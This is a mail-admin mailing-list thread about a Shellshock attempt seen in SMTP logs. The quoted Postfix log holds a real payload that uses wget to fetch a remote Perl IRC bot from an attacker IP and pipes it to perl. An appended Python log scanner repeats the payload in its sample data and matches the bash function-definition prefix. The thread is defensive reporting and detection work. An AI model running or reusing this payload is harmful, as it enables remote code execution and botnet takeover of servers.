I received one of these bad girls to my Nightmare Mail (fork of notqmail),
albeit with a different argument to the attempted wget command (which was never
processed, though my mailserver was able to successfully make delivery of this
technically non-compliant message). It seems to my friends to be an attempt to
exploit Shellshock.

On 14 January 2023 14:16:05 UTC, Mary via mailop <[email protected]> wrote:
>
>Within the past several days, I've been monitoring a kind of exploit that
>affects the 'from' RCPT part of the smtp conversation:
>
>```
>postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350:
>HELO x\r\n
>postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350:
>550 5.5.1 Protocol error; from=<() { :; }; wget -qO -
>193.56.28.202/botF|perl>, to=<root>, proto=SMTP, helo=<x>
>postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
>```
>
>Does anyone know what kind of software is the target of this attack?
>
>Obviously, it's not postfix, which quickly drops the connection. Could it be
>some kind of software that parses logs?
>
>I'd appreciate your thoughts.
>
>PS:
>The payload is a Perl IRC bot.
>_______________________________________________
>mailop mailing list
>[email protected]
>https://list.mailop.org/listinfo/mailop
--
Sent from my Android device with K-9 Mail. Please excuse my brevity.
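A log check for the pattern discussed in this thread, added here as an example and not part of either poster's message: it rejoins hard-wrapped Postfix records and reports any from/to/helo value that starts with the bash function-definition prefix `() {`. The sample records, their addresses and the function names are constructed for illustration.

```python
import re

# Bash function-definition prefix "() {" that the logged payload starts with.
FUNC_DEF = re.compile(r"\s*\(\)\s*\{")
# Postfix logs envelope fields as key=<value>; a value ends at ">" followed
# by the next ", key=" pair or the end of the record.
FIELD = re.compile(r"\b(from|to|helo)=<(.*?)>(?=, \w+=|\s*$)")
# Client address: "[ip]:port" (postscreen) or "host[ip]" (smtpd).
CLIENT = re.compile(r"from [^\s\[]*\[([0-9a-fA-F.:]+)\]")
# Each record carries a "postfix/<daemon>[pid]:" tag.
RECORD_START = re.compile(r"postfix/[\w-]+\[\d+\]:")

# Constructed sample, hard-wrapped the way the quoted log is; addresses are
# documentation ranges and the URL path is a placeholder.
SAMPLE = """\
postfix/postscreen[1001]: NOQUEUE: reject: RCPT from [192.0.2.10]:40000:
550 5.5.1 Protocol error; from=<() { :; }; wget -qO -
198.51.100.7/PLACEHOLDER|perl>, to=<root>, proto=SMTP, helo=<x>
postfix/smtpd[1002]: NOQUEUE: reject: RCPT from unknown[192.0.2.20]:
554 5.7.1 Relay access denied; from=<alice@example.org>,
to=<bob@example.net>, proto=ESMTP, helo=<mail.example.org>
""".splitlines()

def unwrap(lines):
    """Rejoin records that were hard-wrapped across several lines."""
    records = []
    for line in lines:
        line = line.strip()
        if RECORD_START.search(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records

def find_shellshock(lines):
    """Return (client_ip, field, value) for each field with the prefix."""
    hits = []
    for rec in unwrap(lines):
        client = CLIENT.search(rec)
        ip = client.group(1) if client else None
        for field, value in FIELD.findall(rec):
            if FUNC_DEF.match(value):
                hits.append((ip, field, value))
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE):
        print(hit)
```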